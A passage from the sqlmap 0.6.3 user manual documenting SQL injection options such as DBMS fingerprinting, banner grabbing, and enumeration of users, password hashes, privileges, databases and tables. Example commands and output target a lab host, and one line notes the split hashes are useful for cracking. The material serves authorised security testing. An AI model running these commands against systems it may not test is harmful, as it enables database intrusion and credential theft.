Date: Fri, 25 Jul 2008 14:29:50 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Connection: close
|
|
Transfer-Encoding: chunked
|
|
Content-Type: text/html
|
|
|
|
<html><body>
|
|
<b>SQL results:</b>
|
|
<table border="1">
|
|
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
|
</table>
|
|
</body></html><p>Dynamic content: 1216996190</p>
|
|
|
|
[hh:mm:51] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int_refresh.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Fri, 25 Jul 2008 14:29:51 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Content-Length: 161
|
|
Connection: close
|
|
Content-Type: text/html
|
|
|
|
<html><body>
|
|
<b>SQL results:</b>
|
|
<table border="1">
|
|
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
|
</table>
|
|
</body></html><p>Dynamic content: 1216996191</p>
|
|
|
|
[hh:mm:51] [TRAFFIC OUT] HTTP request:
|
|
GET /sqlmap/mysql/get_int_refresh.php?id=1&cat=2 HTTP/1.1
|
|
Host: 192.168.1.121:80
|
|
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
|
|
Connection: close
|
|
|
|
[hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
|
|
Date: Fri, 25 Jul 2008 14:29:51 GMT
|
|
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
|
|
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
|
|
X-Powered-By: PHP/5.2.4-2ubuntu5.2
|
|
Content-Length: 161
|
|
Connection: close
|
|
Content-Type: text/html
|
|
|
|
<html><body>
|
|
<b>SQL results:</b>
|
|
<table border="1">
|
|
<tr><td>1</td><td>luther</td><td>blissett</td></tr>
|
|
</table>
|
|
</body></html><p>Dynamic content: 1216996191</p>
|
|
|
|
[hh:mm:51] [ERROR] url is not stable, try with --string option, refer to the user's manual
|
|
paragraph 'String match' for details
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, the string after <tt>Dynamic content</tt> changes its
|
|
value every second. In the example it is just a call to PHP
|
|
<tt>time()</tt> function, but on the real world it is usually much more
|
|
than that.
|
|
|
|
<p>
|
|
Looking at the HTTP responses page content you can see that the first five
|
|
lines of code do not change at all.
|
|
So choosing for instance the word <tt>luther</tt> as an output that is
|
|
on the True page content and it is not on the False page content and
|
|
passing it to sqlmap, you should be able to inject anyway.
|
|
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1&cat=2" \
|
|
--string "luther" -v 1
|
|
|
|
[hh:mm:22] [INFO] testing connection to the target url
|
|
[hh:mm:22] [INFO] testing if the provided string is within the target URL page content
|
|
[hh:mm:22] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
|
|
[hh:mm:22] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
|
|
[hh:mm:22] [INFO] testing if GET parameter 'id' is dynamic
|
|
[hh:mm:22] [INFO] confirming that GET parameter 'id' is dynamic
|
|
[hh:mm:22] [INFO] GET parameter 'id' is dynamic
|
|
[hh:mm:22] [INFO] testing sql injection on GET parameter 'id'
|
|
[hh:mm:22] [INFO] testing numeric/unescaped injection on GET parameter 'id'
|
|
[hh:mm:22] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
|
|
[hh:mm:22] [INFO] GET parameter 'id' is numeric/unescaped injectable
|
|
[hh:mm:22] [INFO] testing if GET parameter 'cat' is dynamic
|
|
[hh:mm:22] [WARNING] GET parameter 'cat' is not dynamic
|
|
[hh:mm:22] [INFO] testing for parenthesis on injectable parameter
|
|
[hh:mm:22] [INFO] the injectable parameter requires 0 parenthesis
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, when this option is specified, sqlmap skips the URL
|
|
stability test.
|
|
|
|
<p>
|
|
<em>Consider this option a must when you are dealing with a page which
|
|
content that changes itself at each refresh without modifying the user's
|
|
input</em>.
|
|
|
|
|
|
<sect2>Force the database management system name
|
|
|
|
<p>
|
|
Option: <tt>--dbms</tt>
|
|
|
|
<p>
|
|
By default sqlmap automatically detects the web application's back-end
|
|
database manangement system.
|
|
At the moment the fully supported database management system are four:
|
|
|
|
<itemize>
|
|
<item>MySQL
|
|
<item>Oracle
|
|
<item>PostgreSQL
|
|
<item>Microsoft SQL Server
|
|
</itemize>
|
|
|
|
<p>
|
|
It is possible to force the name if you already know it so that sqlmap
|
|
will skip the fingerprint with an exception for MySQL to only identify if
|
|
it is MySQL < 5.0 or MySQL >= 5.0.
|
|
To avoid also this check you can provide instead <tt>MySQL 4</tt> or
|
|
<tt>MySQL 5</tt>.
|
|
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 2 \
|
|
--dbms "PostgreSQL"
|
|
|
|
[...]
|
|
[hh:mm:31] [DEBUG] skipping to test for MySQL
|
|
[hh:mm:31] [DEBUG] skipping to test for Oracle
|
|
back-end DBMS: PostgreSQL
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
In case you provide <tt>--fingerprint</tt> together with <tt>--dbms</tt>,
|
|
sqlmap will only perform the extensive fingerprint for the specified
|
|
database management system, read the following section for further
|
|
details.
|
|
|
|
<p>
|
|
Note that this option is <bf>not</bf> mandatory and it is strongly
|
|
recommended to use it <bf>only if you are absolutely sure</bf> about the
|
|
back-end database management system. If you do not know it, let sqlmap
|
|
automatically identify it for you.
|
|
|
|
|
|
<sect1>Fingerprint
|
|
|
|
<sect2>Extensive database management system fingerprint
|
|
|
|
<p>
|
|
Options: <tt>-f</tt> or <tt>--fingerprint</tt>
|
|
|
|
<p>
|
|
By default the web application's back-end database management system
|
|
fingerprint is performed requesting a database specific function which
|
|
returns a known static value. By comparing this value with the returned
|
|
value it is possible to identify if the back-end database is effectively
|
|
the one that sqlmap expected.
|
|
|
|
After identifying an injectable vector, sqlmap fingerprints the back-end
|
|
database management system and performs the following queries with their
|
|
specific syntax within the limits of the database architecture.
|
|
|
|
If you want to perform a more accurate database management system
|
|
fingerprint based on various techniques like specific SQL dialects and
|
|
inband error messages, you can provide the <tt>--fingerprint</tt> option.
|
|
|
|
The order of database management systems that sqlmap tests for is:
|
|
|
|
<itemize>
|
|
<item>MySQL
|
|
<item>Oracle
|
|
<item>PostgreSQL
|
|
<item>Microsoft SQL Server
|
|
</itemize>
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1 -f
|
|
|
|
[...]
|
|
[hh:mm:02] [INFO] testing MySQL
|
|
[hh:mm:02] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
|
[hh:mm:02] [INFO] retrieved: 44
|
|
[hh:mm:02] [INFO] performed 20 queries in 0 seconds
|
|
[hh:mm:02] [INFO] confirming MySQL
|
|
[hh:mm:02] [INFO] query: LENGTH(CHAR(52))
|
|
[hh:mm:02] [INFO] retrieved: 1
|
|
[hh:mm:02] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:02] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
|
|
[hh:mm:02] [INFO] retrieved: 4
|
|
[hh:mm:02] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:02] [INFO] query: DATABASE()
|
|
[hh:mm:02] [INFO] retrieved: test
|
|
[hh:mm:02] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:02] [INFO] query: SCHEMA()
|
|
[hh:mm:02] [INFO] retrieved: test
|
|
[hh:mm:02] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:02] [INFO] query: SELECT 4 FROM information_schema.PARTITIONS LIMIT 0, 1
|
|
[hh:mm:02] [INFO] retrieved:
|
|
[hh:mm:02] [INFO] performed 6 queries in 0 seconds
|
|
[hh:mm:02] [INFO] executing MySQL comment injection fingerprint
|
|
back-end DBMS: active fingerprint: MySQL >= 5.0.2 and < 5.1
|
|
comment injection fingerprint: MySQL 5.0.51
|
|
html error message fingerprint: MySQL
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" -v 1 -f
|
|
|
|
[...]
|
|
[hh:mm:26] [WARNING] the back-end DMBS is not MySQL
|
|
[hh:mm:26] [INFO] testing Oracle
|
|
[hh:mm:26] [INFO] query: LENGTH(SYSDATE)
|
|
[hh:mm:26] [INFO] retrieved: 9
|
|
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:26] [INFO] confirming Oracle
|
|
[hh:mm:26] [INFO] query: SELECT VERSION FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
|
|
[hh:mm:26] [INFO] retrieved: 10.2.0.1.0
|
|
[hh:mm:27] [INFO] performed 76 queries in 0 seconds
|
|
back-end DBMS: active fingerprint: Oracle 10g
|
|
html error message fingerprint: Oracle
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -f
|
|
|
|
[...]
|
|
[hh:mm:56] [WARNING] the back-end DMBS is not Oracle
|
|
[hh:mm:56] [INFO] testing PostgreSQL
|
|
[hh:mm:56] [INFO] query: COALESCE(7, NULL)
|
|
[hh:mm:56] [INFO] retrieved: 7
|
|
[hh:mm:56] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:56] [INFO] confirming PostgreSQL
|
|
[hh:mm:56] [INFO] query: LENGTH((CHR(55)))
|
|
[hh:mm:56] [INFO] retrieved: 1
|
|
[hh:mm:56] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:56] [INFO] query: SUBSTR(TRANSACTION_TIMESTAMP(), 1, 1)
|
|
[hh:mm:56] [INFO] retrieved: 2
|
|
[hh:mm:56] [INFO] performed 13 queries in 0 seconds
|
|
back-end DBMS: active fingerprint: PostgreSQL >= 8.2.0
|
|
html error message fingerprint: PostgreSQL
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see from this last example, sqlmap first tested for MySQL,
|
|
then for Oracle, then for PostgreSQL since the user did not forced the
|
|
back-end database management system name.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -v 1 -f
|
|
|
|
[...]
|
|
[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
|
|
[hh:mm:41] [INFO] testing Microsoft SQL Server
|
|
[hh:mm:41] [INFO] query: LTRIM(STR(LEN(7)))
|
|
[hh:mm:41] [INFO] retrieved: 1
|
|
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:41] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
[hh:mm:41] [INFO] retrieved: 0
|
|
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
|
|
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
|
|
html error message fingerprint: Microsoft SQL Server
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
If you want an even more accurate result, based also on banner parsing,
|
|
you can also provide the <tt>-b</tt> or <tt>--banner</tt> option.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1 -f -b
|
|
|
|
[...]
|
|
[hh:mm:11] [INFO] testing MySQL
|
|
[hh:mm:11] [INFO] query: CONCAT(CHAR(52), CHAR(52))
|
|
[hh:mm:11] [INFO] retrieved: 44
|
|
[hh:mm:11] [INFO] performed 20 queries in 0 seconds
|
|
[hh:mm:11] [INFO] confirming MySQL
|
|
[hh:mm:11] [INFO] query: LENGTH(CHAR(52))
|
|
[hh:mm:11] [INFO] retrieved: 1
|
|
[hh:mm:11] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:11] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
|
|
[hh:mm:11] [INFO] retrieved: 4
|
|
[hh:mm:11] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:11] [INFO] query: DATABASE()
|
|
[hh:mm:11] [INFO] retrieved: test
|
|
[hh:mm:11] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:11] [INFO] query: SCHEMA()
|
|
[hh:mm:11] [INFO] retrieved: test
|
|
[hh:mm:11] [INFO] performed 34 queries in 0 seconds
|
|
[hh:mm:11] [INFO] query: SELECT 4 FROM information_schema.PARTITIONS LIMIT 0, 1
|
|
[hh:mm:11] [INFO] retrieved:
|
|
[hh:mm:11] [INFO] performed 6 queries in 0 seconds
|
|
[hh:mm:11] [INFO] query: VERSION()
|
|
[hh:mm:11] [INFO] retrieved: 5.0.51a-3ubuntu5.2
|
|
[hh:mm:12] [INFO] performed 132 queries in 0 seconds
|
|
[hh:mm:12] [INFO] executing MySQL comment injection fingerprint
|
|
back-end DBMS: active fingerprint: MySQL >= 5.0.2 and < 5.1
|
|
comment injection fingerprint: MySQL 5.0.51
|
|
banner parsing fingerprint: MySQL 5.0.51
|
|
html error message fingerprint: MySQL
|
|
[...]
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -v 1 -f -b
|
|
|
|
[...]
|
|
[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
|
|
[hh:mm:03] [INFO] testing Microsoft SQL Server
|
|
[hh:mm:03] [INFO] query: LTRIM(STR(LEN(3)))
|
|
[hh:mm:03] [INFO] retrieved: 1
|
|
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:03] [INFO] query: SELECT SUBSTRING((@@VERSION), 25, 1)
|
|
[hh:mm:03] [INFO] retrieved: 0
|
|
[hh:mm:03] [INFO] performed 13 queries in 0 seconds
|
|
[hh:mm:03] [INFO] query: @@VERSION
|
|
[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
|
|
Aug 6 2000 00:57:48
|
|
Copyright (c) 1988-2000 Microsoft Corporation
|
|
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
|
|
|
|
[hh:mm:08] [INFO] performed 1308 queries in 4 seconds
|
|
back-end DBMS: active fingerprint: Microsoft SQL Server 2000
|
|
banner parsing fingerprint: Microsoft SQL Server 2000 Service Pack 0
|
|
version 8.00.194
|
|
html error message fingerprint: Microsoft SQL Server
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, from the Microsoft SQL Server banner, sqlmap was able to
|
|
correctly identify the database management system service pack.
|
|
The Microsoft SQL Server XML versions file is the result of a sqlmap
|
|
parsing library that fetches data from Chip Andrews'
|
|
<htmlurl url="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
|
|
name="SQLSecurity.com site"> and outputs it to the XML versions file.
|
|
|
|
|
|
<sect1>Enumeration
|
|
|
|
<sect2>Banner
|
|
|
|
<p>
|
|
Option: <tt>-b</tt> or <tt>--banner</tt>
|
|
|
|
<p>
|
|
Most of the modern database management systems have a function or an
|
|
environment variable which returns details on the database managemet
|
|
system version. Sometimes also the operating system where the daemon has
|
|
been compiled on, the operating system architecture, its service pack.
|
|
Usually this function is <tt>version()</tt> or the <tt>@@version</tt>
|
|
environment variable.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -b
|
|
|
|
banner: '5.0.51a-3ubuntu5.2'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -b
|
|
|
|
banner: 'PostgreSQL 8.2.7 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu
|
|
4.2.3-2ubuntu4)'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" -b
|
|
|
|
banner: 'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -b
|
|
|
|
banner:
|
|
---
|
|
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
|
|
Aug 6 2000 00:57:48
|
|
Copyright (c) 1988-2000 Microsoft Corporation
|
|
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
|
|
---
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Current user
|
|
|
|
<p>
|
|
Option: <tt>--current-user</tt>
|
|
|
|
<p>
|
|
It is possible to retrieve the database management system's user which is
|
|
effectively performing the query on the database from the web application.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --current-user
|
|
|
|
current user: 'testuser@localhost'
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Current database
|
|
|
|
<p>
|
|
Option: <tt>--current-db</tt>
|
|
|
|
<p>
|
|
It is possible to retrieve the database management system's database the
|
|
web application is connected to.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --current-db
|
|
|
|
current database: 'master'
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Users
|
|
|
|
<p>
|
|
Option: <tt>--users</tt>
|
|
|
|
<p>
|
|
It is possible to enumerate the list of database management system users.
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --users
|
|
|
|
database management system users [3]:
|
|
[*] postgres
|
|
[*] testuser
|
|
[*] testuser2
|
|
</verb></tscreen>
|
|
|
|
|
|
<sect2>Users password hashes
|
|
|
|
<p>
|
|
Options: <tt>--passwords</tt> and <tt>-U</tt>
|
|
|
|
<p>
|
|
It is possible to enumerate the password hashes for each database
|
|
management system user.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --passwords
|
|
|
|
[*] debian-sys-maint [1]:
|
|
password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892
|
|
[*] root [1]:
|
|
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
|
|
[*] testuser [1]:
|
|
password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
You can also provide the <tt>-U</tt> option to specify the user who you
|
|
want to enumerate the password hashes.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --passwords \
|
|
-U sa
|
|
|
|
database management system users password hashes:
|
|
[*] sa [1]:
|
|
password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491f
|
|
ba9930b62ee5d506955
|
|
header: 0x0100
|
|
salt: 0e16d704
|
|
mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3
|
|
uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, when you enumerate password hashes on Microsoft SQL Server
|
|
sqlmap split the hash, useful if you want to crack it.
|
|
|
|
|
|
<sect2>Users privileges
|
|
|
|
<p>
|
|
Options: <tt>--privileges</tt> and <tt>-U</tt>
|
|
|
|
<p>
|
|
It is possible to enumerate the privileges for each database management
|
|
system user.
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" --privileges
|
|
|
|
[hh:mm:25] [WARNING] unable to retrieve the number of privileges for user 'ANONYMOUS'
|
|
[hh:mm:28] [WARNING] unable to retrieve the number of privileges for user 'DIP'
|
|
database management system users privileges:
|
|
[*] CTXSYS [2]:
|
|
privilege: CTXAPP
|
|
privilege: RESOURCE
|
|
[*] DBSNMP [1]:
|
|
privilege: OEM_MONITOR
|
|
[*] FLOWS_020100 (administrator) [4]:
|
|
privilege: CONNECT
|
|
privilege: DBA
|
|
privilege: RESOURCE
|
|
privilege: SELECT_CATALOG_ROLE
|
|
[*] FLOWS_FILES [2]:
|
|
privilege: CONNECT
|
|
privilege: RESOURCE
|
|
[*] HR (administrator) [3]:
|
|
privilege: CONNECT
|
|
privilege: DBA
|
|
privilege: RESOURCE
|
|
[*] MDSYS [2]:
|
|
privilege: CONNECT
|
|
privilege: RESOURCE
|
|
[*] OUTLN [1]:
|
|
privilege: RESOURCE
|
|
[*] SYS (administrator) [22]:
|
|
privilege: AQ_ADMINISTRATOR_ROLE
|
|
privilege: AQ_USER_ROLE
|
|
privilege: AUTHENTICATEDUSER
|
|
privilege: CONNECT
|
|
privilege: CTXAPP
|
|
privilege: DBA
|
|
privilege: DELETE_CATALOG_ROLE
|
|
privilege: EXECUTE_CATALOG_ROLE
|
|
privilege: EXP_FULL_DATABASE
|
|
privilege: GATHER_SYSTEM_STATISTICS
|
|
privilege: HS_ADMIN_ROLE
|
|
privilege: IMP_FULL_DATABASE
|
|
privilege: LOGSTDBY_ADMINISTRATOR
|
|
privilege: OEM_ADVISOR
|
|
privilege: OEM_MONITOR
|
|
privilege: PLUSTRACE
|
|
privilege: RECOVERY_CATALOG_OWNER
|
|
privilege: RESOURCE
|
|
privilege: SCHEDULER_ADMIN
|
|
privilege: SELECT_CATALOG_ROLE
|
|
privilege: XDBADMIN
|
|
privilege: XDBWEBSERVICES
|
|
[*] SYSTEM (administrator) [2]:
|
|
privilege: AQ_ADMINISTRATOR_ROLE
|
|
privilege: DBA
|
|
[*] TSMSYS [1]:
|
|
privilege: RESOURCE
|
|
[*] XDB [2]:
|
|
privilege: CTXAPP
|
|
privilege: RESOURCE
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
You can also provide the <tt>-U</tt> option to specify the user who you
|
|
want to enumerate the privileges.
|
|
|
|
<p>
|
|
Example on a <bf>PostgreSQL 8.2.7</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" --privileges \
|
|
-U postgres
|
|
|
|
database management system users privileges:
|
|
[*] postgres (administrator) [3]:
|
|
privilege: catupd
|
|
privilege: createdb
|
|
privilege: super
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
As you can see, depending on the user privileges, sqlmap identifies if the
|
|
user is a database management system administrator and show after the
|
|
username this information.
|
|
|
|
<p>
|
|
Note that this feature is not available if the back-end database
|
|
management system is Microsoft SQL Server.
|
|
|
|
|
|
<sect2>Available databases
|
|
|
|
<p>
|
|
Option: <tt>--dbs</tt>
|
|
|
|
<p>
|
|
It is possible to enumerate the list of databases.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --dbs
|
|
|
|
available databases [6]:
|
|
[*] master
|
|
[*] model
|
|
[*] msdb
|
|
[*] Northwind
|
|
[*] pubs
|
|
[*] tempdb
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Note that this feature is not available if the back-end database
|
|
management system is Oracle.
|
|
|
|
<sect2>Databases tables
|
|
|
|
<p>
|
|
Options: <tt>--tables</tt> and <tt>-D</tt>
|
|
|
|
<p>
|
|
It is possible to enumerate the list of tables for all database
|
|
manangement system's databases.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --tables
|
|
|
|
Database: test
|
|
[1 table]
|
|
+---------------------------------------+
|
|
| users |
|
|
+---------------------------------------+
|
|
|
|
Database: information_schema
|
|
[17 tables]
|
|
+---------------------------------------+
|
|
| CHARACTER_SETS |
|
|
| COLLATION_CHARACTER_SET_APPLICABILITY |
|
|
| COLLATIONS |
|
|
| COLUMN_PRIVILEGES |
|
|
| COLUMNS |
|
|
| KEY_COLUMN_USAGE |
|
|
| PROFILING |
|
|
| ROUTINES |
|
|
| SCHEMA_PRIVILEGES |
|
|
| SCHEMATA |
|
|
| STATISTICS |
|
|
| TABLE_CONSTRAINTS |
|
|
| TABLE_PRIVILEGES |
|
|
| TABLES |
|
|
| TRIGGERS |
|
|
| USER_PRIVILEGES |
|
|
| VIEWS |
|
|
+---------------------------------------+
|
|
|
|
Database: mysql
|
|
[17 tables]
|
|
+---------------------------------------+
|
|
| columns_priv |
|
|
| db |
|
|
| func |
|
|
| help_category |
|
|
| help_keyword |
|
|
| help_relation |
|
|
| help_topic |
|
|
| host |
|
|
| proc |
|
|
| procs_priv |
|
|
| tables_priv |
|
|
| time_zone |
|
|
| time_zone_leap_second |
|
|
| time_zone_name |
|
|
| time_zone_transition |
|
|
| time_zone_transition_type |
|
|
| user |
|
|
+---------------------------------------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
You can also provide the <tt>-D</tt> option to specify the database
|
|
that you want to enumerate the tables.
|
|
|
|
<p>
|
|
Example on a <bf>MySQL 5.0.51</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" --tables \
|
|
-D test
|
|
|
|
Database: test
|
|
[1 table]
|
|
+---------------------------------------+
|
|
| users |
|
|
+---------------------------------------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Example on an <bf>Oracle XE 10.2.0.1</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" --tables \
|
|
-D users
|
|
|
|
Database: USERS
|
|
[8 tables]
|
|
+-------------------+
|
|
| DEPARTMENTS |
|
|
| EMPLOYEES |
|
|
| HTMLDB_PLAN_TABLE |
|
|
| JOB_HISTORY |
|
|
| JOBS |
|
|
| LOCATIONS |
|
|
| REGIONS |
|
|
| USERS |
|
|
+-------------------+
|
|
</verb></tscreen>
|
|
|
|
<p>
|
|
Note that on Oracle you have to provide the <tt>TABLESPACE_NAME</tt>
|
|
instead of the database name, in my example that is <tt>users</tt> to
|
|
retrieve all tables owned by an Oracle database management system
|
|
user.
|
|
|
|
|
|
<sect2>Database table columns
|
|
|
|
<p>
|
|
Options: <tt>--columns</tt>, <tt>-T</tt> and <tt>-D</tt>
|
|
|
|
<p>
|
|
It is possible to enumerate the list of columns for a specific database
|
|
table.
|
|
This functionality depends on both <tt>-T</tt> to specify the table name
|
|
and on <tt>-D</tt> to specify the database name.
|
|
|
|
<p>
|
|
Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
|
|
|
|
<tscreen><verb>
|
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" --columns \
|
|
-T users -D master
|
|
|
|
